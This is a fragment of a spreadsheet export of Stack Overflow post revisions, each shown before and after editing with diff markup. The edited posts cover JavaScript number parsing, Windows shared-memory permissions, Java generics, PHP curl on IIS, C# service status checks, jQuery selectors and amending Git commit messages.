+'12..'           // Nan_x000D_
+'.12'            // 0.12_x000D_
+'..12'           // Nan_x000D_
+'foo'            // NaN_x000D_
+'12px'           // NaN_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;To convert a string loosely to a number&lt;/h2&gt; _x000D_
 &lt;p&gt; useful for converting '12px' to 12, for example.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;parseInt(num)     // extracts a numeric value from the _x000D_
                  // start of the string, or NaN._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h3&gt;Examples:&lt;/h3&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;parseInt('12', 10)    // 12_x000D_
parseInt('aaa', 10)   // NaN_x000D_
parseInt('12px', 10)  // 12_x000D_
parseInt('foo2', 10)  // NaN      These last two may be different_x000D_
parseInt('12a5', 10)  // 12       from what you expected to see. _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;Floats&lt;/h2&gt; _x000D_
 &lt;p&gt; Bear in mind that, unlike &lt;code&gt;+num&lt;/code&gt;, &lt;code&gt;parseInt&lt;/code&gt; (as the name suggests) will convert a float into an integer by chopping off everything following the decimal point (if you want to use &lt;code&gt;parseInt()&lt;/code&gt; &lt;em&gt;because of&lt;/em&gt; this behaviour, you're probably better off with &lt;code&gt;Math.floor()&lt;/code&gt; instead):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;parseInt(12.345, 10)   // 12_x000D_
parseInt('12.345', 10) // 12_x000D_
+'12.345'          // 12.345_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;Empty strings&lt;/h2&gt; _x000D_
 &lt;p&gt; Empty strings may be a little counter-intuitive. &lt;code&gt;+num&lt;/code&gt; converts empty strings to zero, and &lt;code&gt;isNaN()&lt;/code&gt; assumes the same:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;+''                // 0_x000D_
isNaN('')          // false_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But &lt;code&gt;parseInt()&lt;/code&gt; does not agree:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;parseInt('', 10)       // NaN_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;To check if a variable (including a string) is a number, check if it is not a number:&lt;/h2&gt; _x000D_
 &lt;p&gt; This works regardless of whether the variable contains is a string or number.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;isNaN(num)     // returns true if the variable does NOT contain a valid number_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h3&gt;Examples:&lt;/h3&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;isNaN(123)     // false_x000D_
isNaN('123')   // false_x000D_
isNaN('foo')   // true_x000D_
isNaN('10px')  // true_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Of course, you can negate this if you need to. For example, to implement the &lt;code&gt;IsNumeric&lt;/code&gt; example you gave:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;function isNumeric(num){_x000D_
    return !isNaN(num)_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;To convert a string containing a number into a number:&lt;/h2&gt; _x000D_
 &lt;p&gt; only works if the string &lt;em&gt;only&lt;/em&gt; contains numeric characters, else it returns &lt;code&gt;NaN&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;+num              // returns the numeric value of the string, or NaN if the _x000D_
                  // string isn't purely numeric characters_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h3&gt;Examples:&lt;/h3&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;+'12'             // 12_x000D_
+'12.'            // 12_x000D_
+'12..'           // Nan_x000D_
+'.12'            // 0.12_x000D_
+'..12'           // Nan_x000D_
+'foo'            // NaN_x000D_
+'12px'           // NaN_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;To convert a string loosely to a number&lt;/h2&gt; _x000D_
 &lt;p&gt; useful for converting '12px' to 12, for example.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;parseInt(num)     // extracts a numeric value from the _x000D_
                  // start of the string, or NaN._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h3&gt;Examples:&lt;/h3&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;parseInt('12', 10)    // 12_x000D_
parseInt('aaa', 10)   // NaN_x000D_
parseInt('12px', 10)  // 12_x000D_
parseInt('foo2', 10)  // NaN      These last two may be different_x000D_
parseInt('12a5', 10)  // 12       from what you expected to see. _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;Floats&lt;/h2&gt; _x000D_
 &lt;p&gt; Bear in mind that, unlike &lt;code&gt;+num&lt;/code&gt;, &lt;code&gt;parseInt&lt;/code&gt; (as the name suggests) will convert a float into an integer by chopping off everything following the decimal point (if you want to use &lt;code&gt;parseInt()&lt;/code&gt; &lt;em&gt;because of&lt;/em&gt; this behaviour, you're probably better off with &lt;code&gt;Math.floor()&lt;/code&gt; instead):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;parseInt(12.345, 10)   // 12_x000D_
parseInt('12.345', 10) // 12_x000D_
+'12.345'          // 12.345_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;Empty strings&lt;/h2&gt; _x000D_
 &lt;p&gt; Empty strings may be a little counter-intuitive. &lt;code&gt;+num&lt;/code&gt; converts empty strings to zero, and &lt;code&gt;isNaN()&lt;/code&gt; assumes the same:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;+''                // 0_x000D_
isNaN('')          // false_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But &lt;code&gt;parseInt()&lt;/code&gt; does not agree:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;parseInt('', 10)       // NaN_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Gust van de Wal</t>
  </si>
  <si>
    <t>Frithjof</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It depends on the object's implementation of .Equals(..).&lt;span class="diff-delete"&gt; By default for an object, the references are compared. If you did change it to a struct, then I believe it would evaluate to true based on the equality of the private members, but it would still be more programmically sound to implement IEquatable.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It depends on the object's implementation of .Equals(..).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Timothy Carter</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've developed a windows application that uses shared memory---that is---memory mapped files for interprocess communication. I have a windows service that does some processing and periodically writes data to the memory mapped file. I have a separate windows application that reads from the memory mapped file and displays the information. The application works as expected on Windows XP, XP Pro and Server 2003, but NOT on Vista.&lt;/p&gt; _x000D_
 &lt;p&gt; I can see that the data being written to the memory mapped file is happening correctly by the windows service because I can open the file with a text editor and see the stored messages, but the "consumer" application can't read from the file. One interesting thing to note here, is that if I close the consumer application and restart it, it consumes the messages that were previously written to the memory mapped file.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, another strange thing is that I get the same behavior when I connect to the windows host using Remote Desktop and invoke/use the consumer application through remote desktop. However, if I invoke the Remote Desktop and connect to the target host's console session with the following command: &lt;code&gt;mstsc -v:servername /F -console&lt;/code&gt;, everything works perfectly.&lt;/p&gt; _x000D_
 &lt;p&gt; So that's why I think the problem is related to permissions. Can anyone comment on this?&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT:&lt;/p&gt; _x000D_
 &lt;p&gt; The ACL that I'm using to create the memory mapped file and the Mutex objects that sychronize access is as follows:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;TCHAR * szSD = TEXT("D:")_x000D_
               TEXT("(A;;RPWPCCDCLCSWRCWDWOGAFA;;;S-1-1-0)")_x000D_
               TEXT("(A;;GA;;;BG)")_x000D_
               TEXT("(A;;GA;;;AN)")_x000D_
               TEXT("(A;;GA;;;AU)")_x000D_
               TEXT("(A;;GA;;;LS)")_x000D_
               TEXT("(A;;GA;;;RD)")_x000D_
               TEXT("(A;;GA;;;WD)")_x000D_
               TEXT("(A;;GA;;;BA)"); _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I think this may be part of the issue.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The ACL that I'm using to create the memory mapped file and the Mutex objects that sychronize access is as follows:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; TCHAR * szSD = TEXT("D:") TEXT("(A;;RPWPCCDCLCSWRCWDWOGAFA;;;S-1-1-0)") TEXT("(A;;GA;;;BG)") TEXT("(A;;GA;;;AN)") TEXT("(A;;GA;;;AU)") TEXT("(A;;GA;;;LS)") TEXT("(A;;GA;;;RD)") TEXT("(A;;GA;;;WD)")&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; TEXT("(A;;GA;;;BA)");&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I think this may be part of the issue.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've developed a windows application that uses shared memory---that is---memory mapped files for interprocess communication. I have a windows service that does some processing and periodically writes data to the memory mapped file. I have a separate windows application that reads from the memory mapped file and displays the information. The application works as expected on Windows XP, XP Pro and Server 2003, but NOT on Vista.&lt;/p&gt; _x000D_
 &lt;p&gt; I can see that the data being written to the memory mapped file is happening correctly by the windows service because I can open the file with a text editor and see the stored messages, but the "consumer" application can't read from the file. One interesting thing to note here, is that if I close the consumer application and restart it, it consumes the messages that were previously written to the memory mapped file.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, another strange thing is that I get the same behavior when I connect to the windows host using Remote Desktop and invoke/use the consumer application through remote desktop. However, if I invoke the Remote Desktop and connect to the target host's console session with the following command: &lt;code&gt;mstsc -v:servername /F -console&lt;/code&gt;, everything works perfectly.&lt;/p&gt; _x000D_
 &lt;p&gt; So that's why I think the problem is related to permissions. Can anyone comment on this?&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT:&lt;/p&gt; _x000D_
 &lt;p&gt; The ACL that I'm using to create the memory mapped file and the Mutex objects that sychronize access is as follows:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;TCHAR * szSD = TEXT("D:")_x000D_
               TEXT("(A;;RPWPCCDCLCSWRCWDWOGAFA;;;S-1-1-0)")_x000D_
               TEXT("(A;;GA;;;BG)")_x000D_
               TEXT("(A;;GA;;;AN)")_x000D_
               TEXT("(A;;GA;;;AU)")_x000D_
               TEXT("(A;;GA;;;LS)")_x000D_
               TEXT("(A;;GA;;;RD)")_x000D_
               TEXT("(A;;GA;;;WD)")_x000D_
               TEXT("(A;;GA;;;BA)"); _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I think this may be part of the issue.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use this instead:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  public List&amp;lt;? extends Foo&amp;gt; getFoos()_x000D_
  {_x000D_
    List&amp;lt;Foo&amp;gt; foos = new ArrayList&amp;lt;Foo&amp;gt;(); /* Or List&amp;lt;SubFoo&amp;gt; */_x000D_
    foos.add(new SubFoo());_x000D_
    return foos;_x000D_
  }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Once you declare foos as &lt;code&gt;List&amp;lt;? extends Foo&amp;gt;&lt;/code&gt;, the compiler doesn't know that it's safe to add a SubFoo. What if an &lt;code&gt;ArrayList&amp;lt;AltFoo&amp;gt;&lt;/code&gt; had been assigned to &lt;code&gt;foos&lt;/code&gt;? That would be a valid assignment, but adding a SubFoo would pollute the collection.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use this instead:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;1&lt;/span&gt;  public List&amp;lt;? extends Foo&amp;gt; getFoos()_x000D_
&lt;span class="diff-add"&gt;2&lt;/span&gt;  {_x000D_
&lt;span class="diff-add"&gt;3&lt;/span&gt;    List&amp;lt;Foo&amp;gt; foos = new ArrayList&amp;lt;Foo&amp;gt;(); /* Or List&amp;lt;SubFoo&amp;gt; */_x000D_
&lt;span class="diff-add"&gt;4&lt;/span&gt;    foos.add(new SubFoo());_x000D_
&lt;span class="diff-add"&gt;5&lt;/span&gt;    return foos;_x000D_
&lt;span class="diff-add"&gt;6&lt;/span&gt;  }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Once you declare foos as &lt;code&gt;List&amp;lt;? extends Foo&amp;gt;&lt;/code&gt;, the compiler doesn't know that it's safe to add a SubFoo. What if an &lt;code&gt;ArrayList&amp;lt;AltFoo&amp;gt;&lt;/code&gt; had been assigned to &lt;code&gt;foos&lt;/code&gt;? That would be a valid assignment, but adding a SubFoo would pollute the collection.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>arcticwhite</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Try opening up a command prompt to c:\php and &lt;span class="diff-delete"&gt;run the following command&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;php -c . -i | find /i "curl"_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Does it come &lt;span class="diff-delete"&gt;up&lt;/span&gt; with any output? If so, &lt;span class="diff-delete"&gt;it may not be reading&lt;/span&gt; the &lt;span class="diff-delete"&gt;correct&lt;/span&gt; php.ini file&lt;span class="diff-delete"&gt; when you're using IIS&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Make sure php_curl.dll is in the directory listed under "extension_dir" in php.ini. If it is already, try restarting IIS (Apache always needs a restart from me when making php.ini changes).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT 1:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Try opening up a command prompt to c:\php and &lt;span class="diff-add"&gt;running&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;php -c . -i | find /i "curl"_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Does it come &lt;span class="diff-add"&gt;back&lt;/span&gt; with any output? If so, &lt;span class="diff-add"&gt;IIS is using&lt;/span&gt; the &lt;span class="diff-add"&gt;wrong&lt;/span&gt; php.ini file&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT 2:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Is c:\php in your PATH? You can check with "echo %PATH%" from the command prompt&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Randy</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt; Add &lt;code&gt;&lt;span class="diff-delete"&gt;System.ServiceProcess&lt;/span&gt;&lt;/code&gt; to your project references (&lt;span class="diff-delete"&gt;it's in&lt;/span&gt; the .NET tab).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The quick way:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;return new ServiceController( SERVICE_NAME ).Status == ServiceControllerStatus.Running;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The safer way:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;try_x000D_
{_x000D_
    &lt;/span&gt;using&lt;span class="diff-delete"&gt;( ServiceController sc = new ServiceController( SERVICE_NAME ) )_x000D_
    {_x000D_
        return sc.Status == ServiceControllerStatus.Running;_x000D_
    }_x000D_
}_x000D_
catch( ArgumentException ) { return false; }_x000D_
catch( Win32Exception ) { return&lt;/span&gt; &lt;span class="diff-delete"&gt;false; }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The verbose way:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;using &lt;/span&gt;System.ServiceProcess;&lt;span class="diff-delete"&gt;_x000D_
_x000D_
//&lt;/span&gt;_x000D_
_x000D_
ServiceController &lt;span class="diff-delete"&gt;sc;_x000D_
try_x000D_
{_x000D_
    &lt;/span&gt;sc = new ServiceController(&lt;span class="diff-delete"&gt; SERVICE_NAME &lt;/span&gt;);&lt;span class="diff-delete"&gt;_x000D_
}_x000D_
catch( ArgumentException )_x000D_
{_x000D_
    return "Invalid service name."; // Note that just because a name is valid does not mean the service exists._x000D_
}_x000D_
_x000D_
using( sc )_x000D_
{&lt;/span&gt;_x000D_
    &lt;span class="diff-delete"&gt;ServiceControllerStatus&lt;/span&gt; &lt;span class="diff-delete"&gt;status;_x000D_
 &lt;/span&gt;   &lt;span class="diff-delete"&gt;try_x000D_
&lt;/span&gt;    &lt;span class="diff-delete"&gt;{&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;       &lt;/span&gt; &lt;span class="diff-delete"&gt;sc.Refresh&lt;/span&gt;(&lt;span class="diff-delete"&gt;); // calling &lt;/span&gt;sc.&lt;span class="diff-delete"&gt;Refresh() is unnecessary on the first use of `Status` but if you keep the ServiceController in-memory then be sure to call this if you're using it periodically._x000D_
        status = sc.Status;_x000D_
    }_x000D_
    catch( Win32Exception ex )_x000D_
    {_x000D_
        // A Win32Exception will be raised if the service-name does not exist or the running process has insufficient permissions to query service status._x000D_
        // See Win32 QueryServiceStatus()'s documentation._x000D_
        return "Error: " + ex.Message;_x000D_
    }_x000D_
_x000D_
    switch( status &lt;/span&gt;)_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;{_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    case ServiceControllerStatus.Running:_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        return "Running";_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    case ServiceControllerStatus.Stopped:_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        return "Stopped";_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    case ServiceControllerStatus.Paused:_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        return "Paused";_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    case ServiceControllerStatus.StopPending:_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        return "Stopping";_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    case ServiceControllerStatus.StartPending:_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        return "Starting";_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    default:_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        return "Status Changing";&lt;span class="diff-delete"&gt;_x000D_
    }&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt; Add &lt;span class="diff-add"&gt;System.ServiceProcess&lt;/span&gt; to your project references (&lt;span class="diff-add"&gt;It's on&lt;/span&gt; the .NET tab).&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;using System.ServiceProcess;_x000D_
_x000D_
ServiceController sc = new ServiceController(&lt;span class="diff-add"&gt;SERVICENAME&lt;/span&gt;);_x000D_
            _x000D_
&lt;span class="diff-add"&gt;switch&lt;/span&gt; (sc.&lt;span class="diff-add"&gt;Status&lt;/span&gt;)_x000D_
{_x000D_
    case ServiceControllerStatus.Running:_x000D_
        return "Running";_x000D_
    case ServiceControllerStatus.Stopped:_x000D_
        return "Stopped";_x000D_
    case ServiceControllerStatus.Paused:_x000D_
        return "Paused";_x000D_
    case ServiceControllerStatus.StopPending:_x000D_
        return "Stopping";_x000D_
    case ServiceControllerStatus.StartPending:_x000D_
        return "Starting";_x000D_
    default:_x000D_
        return "Status Changing";_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Carl</t>
  </si>
  <si>
    <t>SharpC</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use the &lt;a href="http://docs.jquery.com/Selectors/hidden" rel="nofollow noreferrer"&gt;&lt;code&gt;hidden&lt;/code&gt;&lt;/a&gt; selector:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://demo.cmswebexperts.com/how-to-check-an-element-is-visible-or-not-using-jquery.html" rel="nofollow noreferrer"&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;See EXAMPLE&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// Matches all elements that are hidden_x000D_
$('element:hidden')_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And the &lt;a href="http://docs.jquery.com/Selectors/visible" rel="nofollow noreferrer"&gt;&lt;code&gt;visible&lt;/code&gt;&lt;/a&gt; selector:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// Matches all elements that are visible_x000D_
$('element:visible')_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use the &lt;a href="http://docs.jquery.com/Selectors/hidden" rel="nofollow noreferrer"&gt;&lt;code&gt;hidden&lt;/code&gt;&lt;/a&gt; selector:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// Matches all elements that are hidden_x000D_
$('element:hidden')_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And the &lt;a href="http://docs.jquery.com/Selectors/visible" rel="nofollow noreferrer"&gt;&lt;code&gt;visible&lt;/code&gt;&lt;/a&gt; selector:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// Matches all elements that are visible_x000D_
$('element:visible')_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>twernt</t>
  </si>
  <si>
    <t>user6799817</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You should be able to use the "not" and "first child" selectors&lt;span class="diff-delete"&gt;, like this:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$("li:not(:first-child)").addClass("something");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;a href="http://docs.jquery.com/Selectors/not" rel="nofollow noreferrer"&gt;http://docs.jquery.com/Selectors/not&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://docs.jquery.com/Selectors/firstChild" rel="nofollow noreferrer"&gt;http://docs.jquery.com/Selectors/firstChild&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You should be able to use the "not" and "first child" selectors&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$("li:not(:first-child)").addClass("something");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;a href="http://docs.jquery.com/Selectors/not" rel="nofollow noreferrer"&gt;http://docs.jquery.com/Selectors/not&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://docs.jquery.com/Selectors/firstChild" rel="nofollow noreferrer"&gt;http://docs.jquery.com/Selectors/firstChild&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>gsamaras</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I change the&lt;span class="diff-delete"&gt; message of my last&lt;/span&gt; commit &lt;span class="diff-delete"&gt;in Git&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; I have not yet pushed the commit to anyone.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I stupidly did a Git commit while half asleep, and wrote the totally wrong thing in the commit message.&lt;/span&gt; How do I change the commit &lt;span class="diff-add"&gt;message&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; I have not yet pushed the commit to anyone.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Lucas</t>
  </si>
  <si>
    <t>isaacbernat</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can we produce the effect of the red line under a bad spelling word like the image below :&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://img505.imageshack.us/my.php?image=options285x395rg9.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;alt text http://img505.imageshack.us/img505/7253/options285x395rg9.th.png &lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How can we produce the effect of the red line under a bad spelling word like the image below :&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://img505.imageshack.us/img505/7253/options285x395rg9.th.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;alt text http://img505.imageshack.us/img505/7253/options285x395rg9.th.png&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Update&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I do not want to use Google or whatever spell program. I would like to know how to create the effect of the red line.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Patrick Desjardins</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; i have code in vb6 ( this code do coping the flash memory to acertain trac ) i want to convert it to c#&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; i have code in vb6 ( this code do coping the flash memory to acertain trac ) i want to convert it to c#&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt;&amp;nbsp; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
